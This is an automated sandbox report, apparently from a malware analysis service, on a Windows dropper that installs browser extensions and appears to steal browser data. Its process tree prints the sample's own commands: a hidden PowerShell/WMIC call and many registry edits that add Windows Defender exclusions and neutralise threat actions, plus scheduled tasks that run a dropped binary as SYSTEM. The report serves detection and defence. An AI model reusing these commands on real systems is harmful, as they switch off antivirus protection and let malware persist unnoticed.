Analysis
  max time kernel: 148s
  max time network: 150s
  platform: windows10-2004_x64
  resource: win10v2004-20240226-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 07-04-2024 23:43
  Static task: static1
  Behavioral task: behavioral1
  Sample: 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe
  Resource: win7-20240221-en
General
  Target: 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe
  Size: 6.6MB
  MD5: d3acc3ecd7d0ebba98f5cb5d40eca69e
  SHA1: b47c16250eb0a92c3a2830b4fae6f2b31d22b44c
  SHA256: 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1
  SHA512: 12714b3c5c9a572c7a713aa0271e79b7801764d0a96e96f22b489815b45318855671379dd4f202b115bf3c81f97358d067fd5e0a7b67cef4484eb6a7d56cf59a
  SSDEEP: 196608:91O+PM1g/Yk3wokBf8uLAlC3qsW4Ul2VmHZ4Dc7t:3O+PCg/IokBUuk2UlW/Dc5
Malware Config
Signatures
Blocklisted process makes network request 1 IoCs
Processes:
  flow | pid  | process
  66   | 4916 | rundll32.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description       | ioc                                                             | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
  description       | ioc                                                                                                  | process
  Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | Install.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | SYnDWRn.exe
Executes dropped EXE 3 IoCs
Processes:
  pid  | process
  1648 | Install.exe
  4644 | AsrnguO.exe
  3912 | SYnDWRn.exe
Loads dropped DLL 1 IoCs
Processes:
  pid  | process
  4916 | rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 2 IoCs
Processes:
  description  | ioc                                                                                                                          | process
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json   | SYnDWRn.exe
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | SYnDWRn.exe
Drops desktop.ini file(s) 1 IoCs
Processes:
  description                  | ioc                                    | process
  File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini   | SYnDWRn.exe
Drops file in System32 directory 29 IoCs
Processes: SYnDWRn.exe, AsrnguO.exe, powershell.exe
Drops file in Program Files directory 14 IoCs
Processes:
  description                  | ioc                                                                                          | process
  File created                 | C:\Program Files (x86)\bHChqWbaifmeC\yfYcztl.xml                                             | SYnDWRn.exe
  File created                 | C:\Program Files (x86)\tYlulnlhfvUn\erYfueB.dll                                              | SYnDWRn.exe
  File created                 | C:\Program Files (x86)\atUnoJEcU\wUHcGx.dll                                                  | SYnDWRn.exe
  File created                 | C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\vFIWIzm.xml                                       | SYnDWRn.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | SYnDWRn.exe
  File created                 | C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\pNvkEBQ.dll                                       | SYnDWRn.exe
  File created                 | C:\Program Files (x86)\OiJitsNRDAtU2\YqdZEqY.xml                                             | SYnDWRn.exe
  File created                 | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak                                         | SYnDWRn.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja                                             | SYnDWRn.exe
  File created                 | C:\Program Files (x86)\atUnoJEcU\WXvLvkq.xml                                                 | SYnDWRn.exe
  File created                 | C:\Program Files (x86)\OiJitsNRDAtU2\QwBUIHTcIGbxW.dll                                       | SYnDWRn.exe
  File created                 | C:\Program Files (x86)\bHChqWbaifmeC\HKEOgRB.dll                                             | SYnDWRn.exe
  File created                 | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | SYnDWRn.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak                                         | SYnDWRn.exe
Drops file in Windows directory 4 IoCs
Processes:
  description  | ioc                                       | process
  File created | C:\Windows\Tasks\azeUktJAaUwkEYH.job      | schtasks.exe
  File created | C:\Windows\Tasks\CtcwvJUdbvqSdFcLs.job    | schtasks.exe
  File created | C:\Windows\Tasks\bjzvzwrptCEFdBfgJx.job   | schtasks.exe
  File created | C:\Windows\Tasks\eKTzntQiDjkvtKkfQ.job    | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid  | process
  3124 | schtasks.exe
  1532 | schtasks.exe
  4136 | schtasks.exe
  4664 | schtasks.exe
  2264 | schtasks.exe
  1892 | schtasks.exe
  1220 | schtasks.exe
  2320 | schtasks.exe
  4436 | schtasks.exe
  4112 | schtasks.exe
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
  description       | ioc                                                              | process
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                | Install.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                | rundll32.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Modifies data under HKEY_USERS 64 IoCs
Processes: powershell.exe, SYnDWRn.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: powershell.exe, powershell.EXE, SYnDWRn.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: powershell.exe, WMIC.exe, powershell.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes: 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe, Install.exe, forfiles.exe, cmd.exe, powershell.exe, AsrnguO.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe.\Install.exe /riRVBdidLX "385118" /S2⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bjzvzwrptCEFdBfgJx" /SC once /ST 23:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe\" Fi /Wgsite_idydi 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3124
-
-
-
C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exeC:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe Fi /Wgsite_idydi 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\SysWOW64\cmd.exe [tree depth 3]
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
- Suspicious use of WriteProcessMemory
PID:3856

C:\Windows\SysWOW64\reg.exe [tree depth 4]
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
PID:4112

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
PID:2404

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
PID:1744

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
PID:3396

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
PID:4064

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
PID:4464

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
PID:3632

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
PID:2096

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
PID:4924

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
PID:4480

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
PID:720

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
PID:4396

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
PID:3184

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
PID:2304

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
PID:3360

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
PID:1556

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
PID:2128

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
PID:3712

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
PID:912

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
PID:1212

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
PID:2936

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
PID:4612

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
PID:2132

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
PID:1536

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
PID:1968

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
PID:3664

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
PID:3808

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
PID:4916
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [tree depth 2]
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OiJitsNRDAtU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OiJitsNRDAtU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\atUnoJEcU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\atUnoJEcU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bHChqWbaifmeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bHChqWbaifmeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tYlulnlhfvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tYlulnlhfvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hdPjkOXNzukcsjVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hdPjkOXNzukcsjVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HbtuuClNkkkdGbCN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HbtuuClNkkkdGbCN\" /t REG_DWORD /d 0 /reg:64;"
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4708

C:\Windows\SysWOW64\cmd.exe [tree depth 3]
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:32
PID:3300

C:\Windows\SysWOW64\reg.exe [tree depth 4]
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:32
PID:4820

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:64
PID:1828

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:32
PID:4336

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:64
PID:1924

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:32
PID:1476

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:64
PID:2900

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:32
PID:4196

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:64
PID:4900

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:32
PID:4960

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:64
PID:980

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hdPjkOXNzukcsjVB /t REG_DWORD /d 0 /reg:32
PID:3124

